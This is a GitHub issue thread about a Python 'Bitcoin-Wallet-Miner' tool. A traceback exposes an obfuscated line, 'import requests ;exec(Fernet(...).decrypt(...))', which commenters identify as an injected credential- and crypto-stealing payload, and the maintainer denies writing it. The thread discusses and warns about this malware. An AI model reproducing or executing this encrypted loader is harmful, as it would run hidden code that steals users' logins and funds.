
SyntaxWarning: invalid escape sequence '\(' `-._____.-'""")

Opened this issue · 12 comments SyntaxWarning: invalid escape sequence '('
Bitcoin-Wallet-Miner-main\", line 6, in
import requests ;exec(Fernet(b'7n_miwaUaVYiBEyp9OccQrqxxofGLIvTrPItavlF7TQ=').decrypt(b'gAAAAABk8gbNQAS0dUKTcVbTWBEKC3IrVt8cNepeHlzyFMMgKS1vjegT-M9d13z5gSthEuuwQHFs5sKfO7E28CiyXemLCQK2wNEuXuH7p9AvOMLjMcRuynqKAF0mTlgU9Z-Nmh8a-mg5i1-cfgPsnJ4tUae8RWTWtloE1KPoULA9EexeDMAXgPvSJ2E-3po8D28BgNbfS9-4npnrI4k9zNTJ99WK1ssj6Q=='))
File "", line 1, in
File "", line 30

2023-10-04 06:53:47 UTC

SyntaxError: leading zeros in decimal integer literals are not permitted; use an 0o prefix for octal integers

fyi, that Fernet encrypted code is probably running a malware on your computer and adding it to the startup folder, so that it steals your logins infos and cryptos.

how would it install malware? you have the whole source code where is it installing malware?
it's not fernet encrypted code from me, it gets triggered trough that error (that nobody reported before btw) from "import requests".
this repo has been online for over a year now without anyone ever complaining about credentials being stolen or anything similar, why are you trying to destroy my reputation by spamming that stupid message everywhere without checking the code yourself. pretty emerassing...

if anyone actually gives a shit, just get the Fernet code, log it into a file with ".decode('utf-8'))" at the end and you will see the following:
just search on the internet for '-'

if anyone actually gives a shit, just get the Fernet code, log it into a file with ".decode('utf-8'))" at the end and you will see the following:
just search on the internet for '-'

there is no fernet code in my py script so what are you getting at

could the site I'm scraping from be the problem?
as I said, the project has not been updated since over a year and the website used to look like this:
and now it's down...

is this possible to get this tool more faster.............

so the code on top is not from my tool right?

Hey, yes you are right @cloutjs sorry for some problem caused, but the code reported on the first message in this issue contains malware, not your project! I'm sorry, but for real, be really careful with that code and with PRs from people you don't know 😄

Hey, yes you are right @cloutjs sorry for some problem caused, but the code reported on the first message in this issue contains malware, not your project! I'm sorry, but for real, be really careful with that code and with PRs from people you don't know 😄

no problem man really, I was so confused at first too haha

the api does not work anymore, is down and is returning errors, do you have any new site to use?